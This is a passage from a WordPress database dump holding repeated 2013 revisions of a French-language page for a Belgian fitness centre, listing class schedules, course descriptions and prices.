5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">19h00</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">19h45</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<strong>Le week-end</strong>\r\n\r\n<strong><span style=\"text-decoration: underline;\">TRX</span> :</strong> entrainement basé sur le poids du corps ! Vous réaliserez des centaines d’exercices qui permettront de développer puissance, force, souplesse, équilibre, mobilité tout en évitant les blessures et avec l\'intensité que vous avez choisie.\r\n\r\n<strong><span style=\"text-decoration: underline;\">Circuit GLFE</span> :</strong> travaillez de manière fun sur un circuit ultra complet, adapté à votre niveau. Relevez des challenges et augmentez votre confiance en vous ! Ce circuit utilise tous les outils.\r\n\r\n<strong><span style=\"text-decoration: underline;\">RIP-KETTLE</span> :</strong> alternance d’exercices avec le Kettlebell (cible les zones inaccessibles avec haltères et charges guidées) et le RIP Trainer (outils issu de la kinésithérapie pour travailler la stabilité de la ceinture abdominale, la coordination,…). Excellent cours pour renforcer, tonifier et raffermir en profondeur votre corps.\r\n\r\n<strong><span style=\"text-decoration: underline;\">CARDIO</span> :</strong> pour développer votre endurance musculaire et cardiovasculaire. Idéal pour brûler un maximum de calories et perdre du poids !', 'Les séances', '', 'inherit', 'open', 'open', '', '11-revision-v1', '', '', '2013-07-03 17:53:40', '2013-07-03 17:53:40', '', 11, 'http://www.crosstrainingcenter.be/?p=202', 0, 'revision', '', 0),
(203, 1, '2013-07-03 17:54:00', '2013-07-03 17:54:00', '<h2>Team Training :</h2>\r\nLes séances sont programmées selon le planning ci-dessous.\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td colspan=\"2\">\r\n<h6>En semaine :</h6>\r\n<table style=\"width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\"></td>\r\n<td class=\"ttitreh\">LUNDI</td>\r\n<td class=\"ttitreh\">MARDI</td>\r\n<td class=\"ttitreh\">MERCREDI</td>\r\n<td class=\"ttitreh\">JEUDI</td>\r\n<td class=\"ttitreh\">VENDREDI</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttitreg\">17h30</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"ttitreg\">18h15</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttitreg\">19h00</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"ttitreg\">19h45</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"width: 50%;\">\r\n<h6>Le week-end :</h6>\r\n<table style=\"width: 90%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\"></td>\r\n<td class=\"ttitreh\">Samedi</td>\r\n<td class=\"ttitreh\">Dimanche</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitreg\">11h00</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitreg\">11h30</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitreg\">12h00</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n<td style=\"width: 50%;\">toto\r\ntiti\r\ntoutou</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h2>Nous vous  proposons chaque jour :</h2>\r\n- <strong>Team Training</strong> : entrainements en groupe avec un coach qualifié (8 à 12 pers.)\r\n- <strong>Duo Training</strong> : entrainements à deux personnes sous la supervision d’un coach\r\n- <strong>Personal Training</strong> : un coach par personne, l’idéal pour progresser plus rapidement!\r\n- <strong>Coaching nutritionnel</strong> : rendez-vous avec une diététicienne pour améliorer votre santé\r\n<h2>Prix :</h2>\r\n&nbsp;\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px; border-bottom-style: dotted;\">Team Training (réservation obligatoire)</td>\r\n<td style=\"border: 0px; padding: 5px;\">1 séance : 9.00€1 carte de 10 séances : 80.00€ (valable 3 mois)\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)\r\nAbonnement 1 mois illimité : 69.00€</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 0px; padding: 5px;\">Package alimentation + sport</td>\r\n<td style=\"border: 0px; padding: 5px;\">1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px;\">Coaching nutritionnel</td>\r\n<td style=\"border: 0px; padding: 5px;\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€Suivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h2>Horaire :</h2>\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px;\">Team Training (réservation obligatoire)</td>\r\n<td style=\"border: 0px; padding: 5px;\">Du Lundi au Vendredi 4 séances : 17h30 – 18h15 – 19h00 – 19h45\r\nSamedi et Dimanche 3 séances : 11h00 – 11h30 – 12h00</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 0px; padding: 5px;\">Personal et Duo Training (sur rendez-vous)</td>\r\n<td style=\"border: 0px; padding: 5px;\">Tous les jours du lundi au dimanche.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h2>Les cours :</h2>\r\n<strong>En semaine</strong>\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\"></td>\r\n<td style=\"border: 1px; padding: 5px;\">Lundi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Mardi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Mercredi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Jeudi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Vendredi</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">17h30</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">18h15</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">19h00</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">19h45</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<strong>Le week-end</strong>\r\n\r\n<strong><span style=\"text-decoration: underline;\">TRX</span> :</strong> entrainement basé sur le poids du corps ! Vous réaliserez des centaines d’exercices qui permettront de développer puissance, force, souplesse, équilibre, mobilité tout en évitant les blessures et avec l\'intensité que vous avez choisie.\r\n\r\n<strong><span style=\"text-decoration: underline;\">Circuit GLFE</span> :</strong> travaillez de manière fun sur un circuit ultra complet, adapté à votre niveau. Relevez des challenges et augmentez votre confiance en vous ! Ce circuit utilise tous les outils.\r\n\r\n<strong><span style=\"text-decoration: underline;\">RIP-KETTLE</span> :</strong> alternance d’exercices avec le Kettlebell (cible les zones inaccessibles avec haltères et charges guidées) et le RIP Trainer (outils issu de la kinésithérapie pour travailler la stabilité de la ceinture abdominale, la coordination,…). Excellent cours pour renforcer, tonifier et raffermir en profondeur votre corps.\r\n\r\n<strong><span style=\"text-decoration: underline;\">CARDIO</span> :</strong> pour développer votre endurance musculaire et cardiovasculaire. Idéal pour brûler un maximum de calories et perdre du poids !', 'Les séances', '', 'inherit', 'open', 'open', '', '11-revision-v1', '', '', '2013-07-03 17:54:00', '2013-07-03 17:54:00', '', 11, 'http://www.crosstrainingcenter.be/?p=203', 0, 'revision', '', 0);
INSERT INTO `www2_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(204, 1, '2013-07-03 17:57:10', '2013-07-03 17:57:10', '<h2>Team Training :</h2>\r\nLes séances sont programmées selon le planning ci-dessous.\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td colspan=\"2\">\r\n<h6>En semaine :</h6>\r\n<table style=\"width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\"></td>\r\n<td class=\"ttitreh\">LUNDI</td>\r\n<td class=\"ttitreh\">MARDI</td>\r\n<td class=\"ttitreh\">MERCREDI</td>\r\n<td class=\"ttitreh\">JEUDI</td>\r\n<td class=\"ttitreh\">VENDREDI</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttitreg\">17h30</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"ttitreg\">18h15</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttitreg\">19h00</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"ttitreg\">19h45</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"width: 50%;\">\r\n<h6>Le week-end :</h6>\r\n<table style=\"width: 90%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\"></td>\r\n<td class=\"ttitreh\">Samedi</td>\r\n<td class=\"ttitreh\">Dimanche</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitreg\">11h00</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitreg\">11h30</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitreg\">12h00</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n<td style=\"width: 50%;\">\r\n<strong><span style=\"text-decoration: underline;\">TRX</span> :</strong> entrainement basé sur le poids du corps ! Vous réaliserez des centaines d’exercices qui permettront de développer puissance, force, souplesse, équilibre, mobilité tout en évitant les blessures et avec l\'intensité que vous avez choisie.\r\n\r\n<strong><span style=\"text-decoration: underline;\">Circuit GLFE</span> :</strong> travaillez de manière fun sur un circuit ultra complet, adapté à votre niveau. Relevez des challenges et augmentez votre confiance en vous ! Ce circuit utilise tous les outils.\r\n\r\n<strong><span style=\"text-decoration: underline;\">RIP-KETTLE</span> :</strong> alternance d’exercices avec le Kettlebell (cible les zones inaccessibles avec haltères et charges guidées) et le RIP Trainer (outils issu de la kinésithérapie pour travailler la stabilité de la ceinture abdominale, la coordination,…). Excellent cours pour renforcer, tonifier et raffermir en profondeur votre corps.\r\n\r\n<strong><span style=\"text-decoration: underline;\">CARDIO</span> :</strong> pour développer votre endurance musculaire et cardiovasculaire. Idéal pour brûler un maximum de calories et perdre du poids !\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h2>Nous vous  proposons chaque jour :</h2>\r\n- <strong>Team Training</strong> : entrainements en groupe avec un coach qualifié (8 à 12 pers.)\r\n- <strong>Duo Training</strong> : entrainements à deux personnes sous la supervision d’un coach\r\n- <strong>Personal Training</strong> : un coach par personne, l’idéal pour progresser plus rapidement!\r\n- <strong>Coaching nutritionnel</strong> : rendez-vous avec une diététicienne pour améliorer votre santé\r\n<h2>Prix :</h2>\r\n&nbsp;\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px; border-bottom-style: dotted;\">Team Training (réservation obligatoire)</td>\r\n<td style=\"border: 0px; padding: 5px;\">1 séance : 9.00€1 carte de 10 séances : 80.00€ (valable 3 mois)\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)\r\nAbonnement 1 mois illimité : 69.00€</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 0px; padding: 5px;\">Package alimentation + sport</td>\r\n<td style=\"border: 0px; padding: 5px;\">1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px;\">Coaching nutritionnel</td>\r\n<td style=\"border: 0px; padding: 5px;\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€Suivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h2>Horaire :</h2>\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px;\">Team Training (réservation obligatoire)</td>\r\n<td style=\"border: 0px; padding: 5px;\">Du Lundi au Vendredi 4 séances : 17h30 – 18h15 – 19h00 – 19h45\r\nSamedi et Dimanche 3 séances : 11h00 – 11h30 – 12h00</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 0px; padding: 5px;\">Personal et Duo Training (sur rendez-vous)</td>\r\n<td style=\"border: 0px; padding: 5px;\">Tous les jours du lundi au dimanche.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h2>Les cours :</h2>\r\n<strong>En semaine</strong>\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\"></td>\r\n<td style=\"border: 1px; padding: 5px;\">Lundi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Mardi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Mercredi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Jeudi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Vendredi</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">17h30</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">18h15</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">19h00</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">19h45</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<strong>Le week-end</strong>\r\n\r\n<strong><span style=\"text-decoration: underline;\">TRX</span> :</strong> entrainement basé sur le poids du corps ! Vous réaliserez des centaines d’exercices qui permettront de développer puissance, force, souplesse, équilibre, mobilité tout en évitant les blessures et avec l\'intensité que vous avez choisie.\r\n\r\n<strong><span style=\"text-decoration: underline;\">Circuit GLFE</span> :</strong> travaillez de manière fun sur un circuit ultra complet, adapté à votre niveau. Relevez des challenges et augmentez votre confiance en vous ! Ce circuit utilise tous les outils.\r\n\r\n<strong><span style=\"text-decoration: underline;\">RIP-KETTLE</span> :</strong> alternance d’exercices avec le Kettlebell (cible les zones inaccessibles avec haltères et charges guidées) et le RIP Trainer (outils issu de la kinésithérapie pour travailler la stabilité de la ceinture abdominale, la coordination,…). Excellent cours pour renforcer, tonifier et raffermir en profondeur votre corps.\r\n\r\n<strong><span style=\"text-decoration: underline;\">CARDIO</span> :</strong> pour développer votre endurance musculaire et cardiovasculaire. Idéal pour brûler un maximum de calories et perdre du poids !', 'Les séances', '', 'inherit', 'open', 'open', '', '11-revision-v1', '', '', '2013-07-03 17:57:10', '2013-07-03 17:57:10', '', 11, 'http://www.crosstrainingcenter.be/?p=204', 0, 'revision', '', 0),
(207, 1, '2013-07-03 18:03:14', '2013-07-03 18:03:14', '<h2>Team Training :</h2>\r\nLes séances sont programmées selon le planning ci-dessous.\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td colspan=\"2\">\r\n<h6>En semaine :</h6>\r\n<table style=\"width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\"></td>\r\n<td class=\"ttitreh\">LUNDI</td>\r\n<td class=\"ttitreh\">MARDI</td>\r\n<td class=\"ttitreh\">MERCREDI</td>\r\n<td class=\"ttitreh\">JEUDI</td>\r\n<td class=\"ttitreh\">VENDREDI</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttitreg\">17h30</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"ttitreg\">18h15</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttitreg\">19h00</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"ttitreg\">19h45</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"width: 50%;\">\r\n<h6>Le week-end :</h6>\r\n<table style=\"width: 90%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\"></td>\r\n<td class=\"ttitreh\">Samedi</td>\r\n<td class=\"ttitreh\">Dimanche</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitreg\">11h00</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitreg\">11h30</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitreg\">12h00</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n<td style=\"width: 50%;\"><strong><span style=\"text-decoration: underline;\">TRX</span> :</strong> entrainement basé sur le poids du corps ! Vous réaliserez des centaines d’exercices qui permettront de développer puissance, force, souplesse, équilibre, mobilité tout en évitant les blessures et avec l\'intensité que vous avez choisie.<strong><span style=\"text-decoration: underline;\">Circuit GLFE</span> :</strong> travaillez de manière fun sur un circuit ultra complet, adapté à votre niveau. Relevez des challenges et augmentez votre confiance en vous ! Ce circuit utilise tous les outils.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<strong><span style=\"text-decoration: underline;\">RIP-KETTLE</span> :</strong> alternance d’exercices avec le Kettlebell (cible les zones inaccessibles avec haltères et charges guidées) et le RIP Trainer (outils issu de la kinésithérapie pour travailler la stabilité de la ceinture abdominale, la coordination,…). Excellent cours pour renforcer, tonifier et raffermir en profondeur votre corps.\r\n\r\n<strong><span style=\"text-decoration: underline;\">CARDIO</span> :</strong> pour développer votre endurance musculaire et cardiovasculaire. Idéal pour brûler un maximum de calories et perdre du poids !\r\n<h2>Duo Training :</h2>\r\nUniquement sur rdv\r\nEntrainements à deux personnes sous la supervision d’un coach.\r\n<h2>Personal Training :</h2>\r\nUniquement sur rdv\r\nUn coach par personne, l’idéal pour progresser plus rapidement!\r\n<h2>Coatching nutritionnel :</h2>\r\nUniquement sur rdv\r\nRendez-vous avec une diététicienne pour améliorer votre santé\r\n<h2>Prix :</h2>\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px; border-bottom-style: dotted;\">Team Training (réservation obligatoire)</td>\r\n<td style=\"border: 0px; padding: 5px;\">1 séance : 9.00€1 carte de 10 séances : 80.00€ (valable 3 mois)\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)\r\nAbonnement 1 mois illimité : 69.00€</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 0px; padding: 5px;\">Package alimentation + sport</td>\r\n<td style=\"border: 0px; padding: 5px;\">1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px;\">Coaching nutritionnel</td>\r\n<td style=\"border: 0px; padding: 5px;\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€Suivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h2></h2>', 'Les séances', '', 'inherit', 'open', 'open', '', '11-revision-v1', '', '', '2013-07-03 18:03:14', '2013-07-03 18:03:14', '', 11, 'http://www.crosstrainingcenter.be/?p=207', 0, 'revision', '', 0),
(208, 1, '2013-07-03 18:04:14', '2013-07-03 18:04:14', '<h2>Team Training :</h2>\r\nLes séances sont programmées selon le planning ci-dessous.\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td colspan=\"2\">\r\n<h6>En semaine :</h6>\r\n<table style=\"width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\"></td>\r\n<td class=\"ttitreh\">LUNDI</td>\r\n<td class=\"ttitreh\">MARDI</td>\r\n<td class=\"ttitreh\">MERCREDI</td>\r\n<td class=\"ttitreh\">JEUDI</td>\r\n<td class=\"ttitreh\">VENDREDI</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttitreg\">17h30</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"ttitreg\">18h15</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttitreg\">19h00</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"ttitreg\">19h45</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"width: 50%;\">\r\n<h6>Le week-end :</h6>\r\n<table style=\"width: 90%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\"></td>\r\n<td class=\"ttitreh\">Samedi</td>\r\n<td 